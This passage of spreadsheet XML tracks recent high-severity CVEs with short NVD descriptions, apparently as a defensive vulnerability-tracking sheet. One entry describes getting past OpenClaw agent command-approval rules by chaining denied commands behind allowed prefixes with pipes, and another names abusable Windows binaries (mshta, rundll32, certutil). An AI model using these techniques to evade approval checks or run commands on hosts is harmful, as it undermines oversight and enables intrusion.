      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr"/>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S61" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 sandbox escape leading to code execution was possible via the versioned settings Kotlin DSL</t>
        </is>
      </c>
      <c r="T61" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100253</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100254</t>
        </is>
      </c>
      <c r="D62" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E62" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F62" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr"/>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S62" s="5" t="inlineStr">
        <is>
          <t>In JetBrains TeamCity before 2026.2, 
2026.1.4, 
2025.11.8 authenticated users could execute commands on Windows servers via CRLF injection in Pipeline Git connection settings</t>
        </is>
      </c>
      <c r="T62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100254</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101880</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S63" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incorrect authorization vulnerability in the system.run exec-approval policy where ExecShellWrapperParser fails to split commands on pipe operators or extract command substitutions. Connected gateways or agents can bypass approval rules by placing denied commands behind allowed prefixes using pipe operators or command substitution syntax, achieving arbitrary command execution on Windows hosts.</t>
        </is>
      </c>
      <c r="T63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101880</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101882</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S64" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incomplete validation vulnerability in system.execApprovals.set that accepts wildcard-executable rules and abusable system binaries like mshta, rundll32, and certutil. Remote callers can add broad allow rules to execute arbitrary commands on the Windows host through system.run without operator checks or user prompts.</t>
        </is>
      </c>
      <c r="T64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101882</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102120</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-78</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>A privilege escalation vulnerability in Kiteworks could have allowed an attacker who had already obtained code execution on one node of a clustered Kiteworks deployment to run operating system commands with elevated privileges on another node of the same cluster. Insufficient input validation in an internal cluster management function let attacker-supplied values reach a privileged execution context; exploitation requires existing access to a node in the cluster, and the affected function is not reachable from outside the cluster.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102120</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102125</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-653, CWE-668</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>The sandbox that isolates document conversion on a Kiteworks appliance did not fully confine the code running inside it. Code already executing within that sandbox could potentially escape its confinement and act with the privileges of the service account that runs the application, which could allow an attacker in that position to read or modify application data and configuration, or to disrupt the service on the affected appliance.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102125</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102377</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Photo Gallery by 10Web &lt;= 1.8.46 versions.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102377</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103474</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>yii2-starter-kit through 4.2.0 fails to validate file types in the backend storage upload actions, allowing authenticated managers to upload PHP files. Attackers with manager role can upload PHP scripts to the web-accessible storage directory and request them to execute arbitrary code on the server.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103474</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18783</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability in Trex Digital Smart Manufacturing Systems Inc. Trex MES allows Authentication Bypass.
This issue affects Trex MES: through 2026-09-29.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18783</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80275</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>db4dfee8-a97e-4877-bfae-eba6d14a2166</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-425</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>Comelit Multi-User Gateway for VIP System (model 1456B) firmware versions 2.9.1 and 2.10.0 fail to enforce server-side authorization on an administrative password-change function. An authenticated user level can invoke this function to overwrite the installer (administrator) account password.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80275</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94076</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in SEO Plugin by Squirrly SEO &lt;= 14.2.5 versions.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94076</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94121</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in 10Web Booster – Website speed optimization, Cache &amp; Page Speed optimizer &lt;= 2.33.6 versions.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94121</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94678</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Go Live Update Urls &lt;= 7.0.8 versions.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94678</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94683</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in DesignSetGo &lt;= 2.8.0 versions.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94683</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95531</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Subscriber PHP Object Injection in Conversational Forms for ChatBot &lt;= 1.5.0 versions.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95531</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96831</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Themify Builder &lt;= 7.8.1 versions.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96831</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96837</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Contributor Remote Code Execution (RCE) in CartFlows &lt;= 3.2.0 versions.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96837</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96838</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
